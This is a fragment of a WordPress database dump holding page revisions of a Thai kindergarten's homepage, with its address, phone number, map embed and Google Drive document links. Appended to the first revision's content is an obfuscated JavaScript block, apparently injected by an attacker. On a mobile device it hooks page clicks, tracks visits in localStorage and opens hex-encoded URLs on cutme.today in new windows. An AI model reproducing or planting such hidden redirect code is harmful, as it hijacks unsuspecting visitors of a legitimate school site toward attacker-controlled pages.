ine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:54:13','2024-08-29 07:54:13','',19,'http://watprato.ssk.in.th/?p=274',0,'revision','',0),
(275,2,'2024-08-29 14:55:15','2024-08-29 07:55:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li 